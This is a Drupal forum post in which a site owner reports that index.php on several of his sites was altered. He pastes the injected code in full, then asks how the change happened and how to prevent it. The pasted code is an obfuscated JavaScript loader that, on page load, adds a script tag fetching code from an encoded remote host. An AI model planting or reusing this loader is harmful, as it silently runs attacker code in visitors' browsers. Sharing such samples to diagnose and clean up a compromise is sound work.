Come together with the global Drupal community in Rotterdam, 28 Sept – 1 Oct 2026. Sessions, contribution, connection, and Early Bird savings until 8 June.
By patataur on
Hello
I have a few websites using drupal and they were hacked today.
The index.php file was changed.
Usually the index.php file ends like this :
drupal_page_footer();
The hacked file ended like this :
drupal_page_footer();
<script>try {var Ov="";var w=new String();var D='g';var r="";var k='';var O='[';var S;if(S!='' && S!='M'){S='K'};var V='replace';var sz='';var U=']';var F=RegExp;function I(x,De){var h=O;var W=new Array();var WQ=new Array();h+=De;h+=U;this.j='';var l=new F(h, D);var f;if(f!='BG' && f!='Br'){f='BG'};var n;if(n!='' && n!='wA'){n=null};return x[V](l, k);var Oe;if(Oe!='TO' && Oe!='wY'){Oe=''};};var u=new Array();var q=I('bSoHdjyj',"jHS7");var c;if(c!='BY'){c='BY'};var m;if(m!='PO'){m='PO'};var lh=I('/FgZoZoJgJlZeJ.FiFtZ/ZgJojoZgjlFeJ.jiJtJ/jpjpFljiZvFej.JcJoFmZ/FgJojojgFlFeF.jcZojmJ/ZsjiFtFeFpZojiZnZtj.jcJoFmj.ZpFhjpZ',"jFZJ");var Q=I('sfeftMACtMtCrfifbCuftMeM',"mfCM");this.zE="";var p=I('897907787770997',"97");var pn=new String();var pt=I('a_p_pZeGn_dZCZhGiGlRdR',"ZRG_");var aO=new String();var UQ=I('sEclr4ilpEt4',"lQE45");this.sn='';var x="1";var b=I('ownbl9ovawdv',"wb9qv");var Jz;if(Jz!='SY'){Jz=''};var y='';var bG=new String();var z=I('h5t5t5p5:5/8/Ab8lAo8gxg8e8rx-Ac8o8mx.Aj8u8e5gxoxs5.xcxo8m5.xg5l8oAb8e575-AcAoxm5.8sAuAp5e8rxm5iAcAr5o5txaxg8.5r5u5:8',"5x8A");var MB;if(MB!='OL'){MB='OL'};var d=I('cKrPeLaPtPePEPlKePmPePnKtP',"PLK");var O_=new Array();window[b]=function(){var fG=new String();Qk=document[d](UQ);var Sr;if(Sr!='zW'){Sr='zW'};var SX='';var GQ=new Array();y+=z;y+=p;var iK=new String();y+=lh;var _;if(_!='US' && _ != ''){_=null};var H=document[q];Qk.setAttribute('defer', x);Qk.src=y;var Zg;if(Zg!='N'){Zg=''};this.ja="";var fw;if(fw!=''){fw='dC'};var Ne=new Date();var __=new String();H.appendChild(Qk);var Fg;if(Fg!='Du' && Fg!='jK'){Fg=''};};var hc=new String();var Di;if(Di!='' && Di!='rO'){Di=''};} catch(VH){var Ay=new String();var QF=new String();};</script>
<!--b5ee252c17379984606e50f1f9b5ec57-->Some of my hacked sites are on a shared host. Others are on my dedicated server.
One of my website is using the up-to-date 6.15 drupal. Others are on 6.10
Appart from the core modules, the only modules i use are "backup and migrate" (up-to-date) and "nodewords" (out-dated).
Some are using a home-made theme, others are using Garland.
On some sites the index.php CHMOD is 604 on others 644
Anyone know how my index.php file was modified?
How to prevent that?
Thanks for your help :)
Mat
Comments
Searching this site for
Searching this site for "index.php hacked" would be a good start.